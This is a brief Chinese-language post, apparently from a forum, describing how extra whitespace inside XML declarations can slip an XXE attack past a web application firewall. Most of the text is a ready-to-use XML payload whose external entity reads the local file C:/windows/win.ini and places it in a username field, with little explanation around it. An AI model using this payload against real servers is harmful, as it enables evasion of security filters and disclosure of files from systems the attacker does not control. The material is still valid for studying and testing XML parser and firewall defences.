XML格式允许在格式化标记属性时使用任意数量的空格,因此攻击者可以在<?xml?>或<!DOCTYPE>中插入额外的空格,从而绕过此类WAF.
<?xml
version=”1.0″?>
<!DOCTYPE
test1[
<!ELEMENT
foo ANY>
<!ENTITY test
SYSTEM
“file:///C:/windows/win.ini”>
]>
<user><username>&test;</username><password>admin</password></user>
没有回复内容